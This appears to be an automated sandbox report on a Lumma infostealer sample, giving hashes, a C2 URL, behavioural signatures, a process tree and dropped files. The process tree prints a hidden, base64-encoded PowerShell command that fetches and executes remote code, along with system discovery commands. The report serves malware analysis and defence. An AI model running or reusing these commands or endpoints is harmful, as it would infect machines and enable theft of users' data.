Analysis

  • max time kernel
    144s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 19:10

General

  • Target

    183c6aa694124103e3896ee7b71175f4a81d9533218617cb80d60d9307b53c90.exe

  • Size

    44.4MB

  • MD5

    af3c0e9cada6c8e34d2c1a9e8b77feba

  • SHA1

    f57a1a856bb437d253edd159466c98e81fa3f1a0

  • SHA256

    183c6aa694124103e3896ee7b71175f4a81d9533218617cb80d60d9307b53c90

  • SHA512

    e49f131d3d0e7f68b749f4bc387b30f692a5e73aae2e3e5595ab004e6cac7518bb0b101a8c0022c7401174d5d23de1ccca1dfc433dec8e89c43952ec8a44e093

  • SSDEEP

    786432:+r9TtNURsYshn+BHht9vgoVflXmMgcns2L/vjTR4xz6paBXZH1fGGliTuCbtDdlE:+rpUms94ov2MgDyvjTSxuYfeGibFdDEz

Malware Config

Extracted

Family

lumma

C2

https://quotedjizwe.cyou/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 34 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 32 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\183c6aa694124103e3896ee7b71175f4a81d9533218617cb80d60d9307b53c90.exe
    "C:\Users\Admin\AppData\Local\Temp\183c6aa694124103e3896ee7b71175f4a81d9533218617cb80d60d9307b53c90.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
      C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4680
      • C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
        "C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4520
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5012
          • C:\Windows\SysWOW64\chcp.com
            C:\Windows\System32\chcp.com 65001
            5⤵
            • System Location Discovery: System Language Discovery
            PID:720
          • C:\Windows\system32\reg.exe
            C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
            5⤵
              PID:4600
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4160
            • C:\Windows\SysWOW64\chcp.com
              C:\Windows\System32\chcp.com 866
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2964
            • C:\Windows\SysWOW64\wbem\WMIC.exe
              C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1456
            • C:\Windows\SysWOW64\more.com
              C:\Windows\System32\more.com
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1928
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3832
            • C:\Windows\SysWOW64\chcp.com
              C:\Windows\System32\chcp.com 866
              5⤵
              • System Location Discovery: System Language Discovery
              PID:312
            • C:\Windows\SysWOW64\wbem\WMIC.exe
              C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:4780
            • C:\Windows\SysWOW64\more.com
              C:\Windows\System32\more.com
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4400
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3400
            • C:\Windows\SysWOW64\chcp.com
              C:\Windows\System32\chcp.com 866
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2828
            • C:\Windows\SysWOW64\wbem\WMIC.exe
              C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4932
            • C:\Windows\SysWOW64\more.com
              C:\Windows\System32\more.com
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3360
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1908
            • C:\Windows\SysWOW64\chcp.com
              C:\Windows\System32\chcp.com 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:5024
            • C:\Windows\system32\reg.exe
              C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
              5⤵
                PID:4376
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('DQokcj0naHR0cDovL2NhdHNpLm5ldC9pbmNhbGwucGhwP2NvbXBOYW1lPScrJGVudjpjb21wdXRlcm5hbWU7IFtuZXQuU2VydmljRXBPaU50bUFuYWdlUl06OnNFQ3VyaVRZcFJPVG9jT2wgPSBbbkVULnNlQ1VSSVR5cFJPVG9jb0xUWXBlXTo6VGxzMTI7ICR0dHAgPSBpd3IgJHIgLVVzZUJhc2ljUGFyc2luZyAtVXNlckFnZW50ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQ0NC4xNDMgU2FmYXJpLzUzNy4zNic7IGlleCAkdHRwLkNvbnRlbnQ7')); Invoke-Expression $script}"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4876
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/48ef0a3991b53fbbf729b79d347b63a2/" && (for %F in (*.exe) do start "" "%F")"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:1460
              • C:\Users\Admin\AppData\Local\Temp\48ef0a3991b53fbbf729b79d347b63a2\EASteamProxy.exe
                "EASteamProxy.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                PID:2616
                • C:\Users\Admin\AppData\Roaming\Serverdownload\EASteamProxy.exe
                  C:\Users\Admin\AppData\Roaming\Serverdownload\EASteamProxy.exe
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  PID:2400
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\SysWOW64\cmd.exe
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:1152
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:2136
            • C:\Windows\SysWOW64\explorer.exe
              explorer C:\Users\Admin\AppData\Local\Temp\8c12997345e50b227d307a5bc0ab5d5c.pdf
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2856
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        1⤵
        • Modifies registry class
        PID:1260
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\8c12997345e50b227d307a5bc0ab5d5c.pdf"
          2⤵
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          PID:2112
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            3⤵
            • System Location Discovery: System Language Discovery
            PID:872
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=118FC2123CA151134D21327F731B8F07 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=118FC2123CA151134D21327F731B8F07 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
              4⤵
              • System Location Discovery: System Language Discovery
              PID:3204
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=145D35AE1A23FFA74D8DB42B0B8AE39D --mojo-platform-channel-handle=1812 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2696
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=73CFE19752C3A9F4D214D106EBEAE872 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2060
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=73C7E57BE1B7DD971A102B5FF0892F02 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=73C7E57BE1B7DD971A102B5FF0892F02 --renderer-client-id=5 --mojo-platform-channel-handle=2448 --allow-no-sandbox-job /prefetch:1
              4⤵
              • System Location Discovery: System Language Discovery
              PID:928
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=146A7EC7D4E1445822A5162D81015A32 --mojo-platform-channel-handle=2892 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4584
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D872BEB8F186D29E2040ABF68A870300 --mojo-platform-channel-handle=2032 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2168

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

        Filesize

        36KB

        MD5

        b30d3becc8731792523d599d949e63f5

        SHA1

        19350257e42d7aee17fb3bf139a9d3adb330fad4

        SHA256

        b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

        SHA512

        523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

      • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

        Filesize

        56KB

        MD5

        752a1f26b18748311b691c7d8fc20633

        SHA1

        c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

        SHA256

        111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

        SHA512

        a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

      • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

        Filesize

        64KB

        MD5

        626d4112dde90b84efe31fa6d155ad5a

        SHA1

        acaa0d6e2c9d27ff1c4981f13ffa0f99a49d45e8

        SHA256

        5cc1da54ef4c0b03c773b30c453fe1e3df4a5495f2862299fc5d414a6a085c05

        SHA512

        75f0e2f2dcfb1a58baa48132e7fd197b0de326bbd55a87864627ce6727bcd6d9431949e937da6634211c92f782ee8f84b0b506d35d519ddd27b6b60cc8d72ab5

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4rmgr0oy.tpj.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

        Filesize

        136KB

        MD5

        fca89c62d6ea9f979b3a8d21ee2c4f55

        SHA1

        bd77809998b5cfef93e3c34af3ddb8292f549d44

        SHA256

        6b069e5b450898615e709275bc0a53b529f171301a603093bdc17ebd784e0e34

        SHA512

        f1f1f30d0c07c343d9709dd4a6405751de678886703bd59f2d72751f3d470ca88389b3ce3ba5966282e6f60ae68f13de722e885f4bd1bfae2aad60323edf7df0

      • C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\awt.dll

        Filesize

        1.1MB

        MD5

        159ccf1200c422ced5407fed35f7e37d

        SHA1

        177a216b71c9902e254c0a9908fcb46e8d5801a9

        SHA256

        30eb581c99c8bcbc54012aa5e6084b6ef4fcee5d9968e9cc51f5734449e1ff49

        SHA512

        ab3f4e3851313391b5b8055e4d526963c38c4403fa74fb70750cc6a2d5108e63a0e600978fa14a7201c48e1afd718a1c6823d091c90d77b17562b7a4c8c40365

      • C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\client\jvm.dll

        Filesize

        3.7MB

        MD5

        39c302fe0781e5af6d007e55f509606a

        SHA1

        23690a52e8c6578de6a7980bb78aae69d0f31780

        SHA256

        b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc

        SHA512

        67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77

      • C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\glass.dll

        Filesize

        196KB

        MD5

        434cbb561d7f326bbeffa2271ecc1446

        SHA1

        3d9639f6da2bc8ac5a536c150474b659d0177207

        SHA256

        1edd9022c10c27bbba2ad843310458edaead37a9767c6fc8fddaaf1adfcbc143

        SHA512

        9e37b985ecf0b2fef262f183c1cd26d437c8c7be97aa4ec4cd8c75c044336cc69a56a4614ea6d33dc252fe0da8e1bbadc193ff61b87be5dce6610525f321b6dc

      • C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\java.dll

        Filesize

        123KB

        MD5

        73bd0b62b158c5a8d0ce92064600620d

        SHA1

        63c74250c17f75fe6356b649c484ad5936c3e871

        SHA256

        e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30

        SHA512

        eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f

      • C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javafx_font.dll

        Filesize

        56KB

        MD5

        aeada06201bb8f5416d5f934aaa29c87

        SHA1

        35bb59febe946fb869e5da6500ab3c32985d3930

        SHA256

        f8f0b1e283fd94bd87abca162e41afb36da219386b87b0f6a7e880e99073bda3

        SHA512

        89bad9d1115d030b98e49469275872fff52d8e394fe3f240282696cf31bccf0b87ff5a0e9a697a05befcfe9b24772d65ed73c5dbd168eed111700caad5808a78

      • C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe

        Filesize

        187KB

        MD5

        48c96771106dbdd5d42bba3772e4b414

        SHA1

        e84749b99eb491e40a62ed2e92e4d7a790d09273

        SHA256

        a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22

        SHA512

        9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c

      • C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcp120.dll

        Filesize

        444KB

        MD5

        fd5cabbe52272bd76007b68186ebaf00

        SHA1

        efd1e306c1092c17f6944cc6bf9a1bfad4d14613

        SHA256

        87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608

        SHA512

        1563c8257d85274267089cd4aeac0884a2a300ff17f84bdb64d567300543aa9cd57101d8408d0077b01a600ddf2e804f7890902c2590af103d2c53ff03d9e4a5

      • C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr100.dll

        Filesize

        755KB

        MD5

        bf38660a9125935658cfa3e53fdc7d65

        SHA1

        0b51fb415ec89848f339f8989d323bea722bfd70

        SHA256

        60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa

        SHA512

        25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1

      • C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr120.dll

        Filesize

        948KB

        MD5

        034ccadc1c073e4216e9466b720f9849

        SHA1

        f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1

        SHA256

        86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f

        SHA512

        5f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7

      • C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\net.dll

        Filesize

        78KB

        MD5

        691b937a898271ee2cffab20518b310b

        SHA1

        abedfcd32c3022326bc593ab392dea433fcf667c

        SHA256

        2f5f1199d277850a009458edb5202688c26dd993f68fe86ca1b946dc74a36d61

        SHA512

        1c09f4e35a75b336170f64b5c7254a51461dc1997b5862b62208063c6cf84a7cb2d66a67e947cbbf27e1cf34ccd68ba4e91c71c236104070ef3beb85570213ec

      • C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\nio.dll

        Filesize

        50KB

        MD5

        95edb3cb2e2333c146a4dd489ce67cbd

        SHA1

        79013586a6e65e2e1f80e5caf9e2aa15b7363f9a

        SHA256

        96cf590bddfd90086476e012d9f48a9a696efc054852ef626b43d6d62e72af31

        SHA512

        ab671f1bce915d748ee49518cc2a666a2715b329cab4ab8f6b9a975c99c146bb095f7a4284cd2aaf4a5b4fcf4f939f54853af3b3acc4205f89ed2ba8a33bb553

